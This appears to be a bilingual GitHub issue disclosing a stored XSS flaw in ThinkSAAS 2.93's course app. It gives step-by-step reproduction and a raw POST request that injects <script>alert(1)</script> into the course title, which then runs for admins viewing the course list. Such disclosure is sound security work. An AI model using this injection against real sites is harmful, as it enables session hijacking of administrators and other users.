thinksaas/ThinkSAAS

Stored xss in study

Opened this issue · 0 comments

Eanrach commented
  • Environment:
  • program version: ThinkSAAS 2.93
  • app version: 课程(study) | 1.0
    ``
  • 环境:
  • 程序版本: ThinkSAAS 2.93
  • 应用版本: 课程(study) | 1.0

1 . Request this url: example.com/index.php?app=study
1 . 访问这个url: example.com/index.php?app=study

2 . Click '创建课程'(Create Lession), then redirect to example.com/index.php?app=study&ac=create
2 . 点击‘创建课程’,然后跳转至example.com/index.php?app=study&ac=create

3 . Write the xss payload to ‘课程标题’(Lession Title)
3 . 将xss payload写进'课程标题'

POST /index.php?app=study&ac=create&ts=do HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------293582696224464
Content-Length: 668
Origin: http://example.com
Connection: close
Referer: http://example.com/index.php?app=study&ac=create
Cookie: Hm_lvt_1676addd34fc71983d401b8bd972b0c1=1567155131,1567416207; PHPSESSID=5nkq72udqv51008t7f7lsqekau; ts_email=1%401.com; ts_autologin=dgswuiwhehsko8088w40kwow8k0w8oo
Upgrade-Insecure-Requests: 1

-----------------------------293582696224464
Content-Disposition: form-data; name="studyname"

xss<script>alert(1)</script>
-----------------------------293582696224464
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


-----------------------------293582696224464
Content-Disposition: form-data; name="content"

<p>content<br></p>
-----------------------------293582696224464
Content-Disposition: form-data; name="price"

0
-----------------------------293582696224464
Content-Disposition: form-data; name="cateid"

1
-----------------------------293582696224464--

4 . Then we will redirect to the page that we just created, and the alert will be pop up.
4 . 之后我们将被重定向到刚刚创建的页面,并弹出警报。

5 . The alert also can be pop up when admin see the 'Lession List' ( http://example.com/index.php?app=study&ac=admin&mg=study&ts=list )
5 . 管理员浏览到'课程列表'时也会弹出警报 ( http://example.com/index.php?app=study&ac=admin&mg=study&ts=list )